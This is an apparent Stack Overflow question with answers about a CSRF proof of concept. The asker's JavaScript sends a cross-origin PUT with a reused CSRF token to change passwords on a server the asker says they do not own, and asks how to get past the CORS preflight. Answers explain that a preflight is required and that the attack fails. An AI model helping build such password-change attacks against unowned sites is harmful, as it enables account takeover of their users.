# PUT Request turns into OPTIONS Request with no follow up due to CORS

Tags: javascript, ajax, cors, csrf, put

**What I am trying to accomplish:**

So I am trying to create a POC of CSRF, but the server needs an x-csrf-token; which *should* make it impossible. However, I found an (quite easy) way to send an x-csrf-token which ais always valid. So I want to create a POC on how to change a password and send the X-CSRF-token with it; AJAX *should* do the job.

**Code until now:**

```
 <html>
<button type="button" onclick="loadDoc()">execute</button>

<script>
function loadDoc() {
  var xhttp = new XMLHttpRequest();
  xhttp.onreadystatechange = function() {
    if (this.readyState == 4 && this.status == 200) {
      document.getElementById("demo").innerHTML = this.responseText;
    }
  };
  xhttp.open("PUT", "http://www.example.com/changepassword", true);
  xhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); //is "application/x-www-form-urlencoded" right?
  xhttp.setRequestHeader('X-CSRF-Token', "ThatOneValidToken");
  xhttp.send("{\"password\":\"POC-CSRF-PASSWORD\"}");
}
</script>

</html>
```

**PROBLEM:**

However, because of CORS this PUT Request turns into a OPTIONS request and then there is no followup PUT request. The response to this OPTIONS request is just a simple

> HTTP/1.1 404 Not Found

**QUESTION:**

Since it's an external server that I do not own (explains the POC) I can not do server changes. Can I change the request somehow so that I can still execute the POC; in other words, as far as my imagination reaches, can I bypass this OPTIONS request or modify the request in order to make sure that this OPTIONS preflight Request gets a followup PUT request?

*Thanks in advance, **will buy you a friendly coffee** if you got the solution (if that is legal on stackoverflow).*

Comment: For POC purpose, you might use some browser extension, like https://chrome.google.com/webstore/detail/allow-control-allow-origi/nlfbmbojpeacfghkpbjhddihlkkiljbi to by pass CORS.

Answer (score 0):

Not with client side code.

A cross-origin PUT requests requires a preflight.

A cross-origin request with non-standard headers requires a preflight.

Proxying the request through another server is your only option.

Comment: Ah, thanks! You got any advice on how to accomplish that?

Comment: Because I still need the cookies of the person on www.example.com

Comment: Which you can't get. Looks like the server isn't vulnerable to your CSRF attack after all.

Comment: So actually, if a server uses PUT/DELETE for everything, it doesn't need X-CSRF-Tokens at all?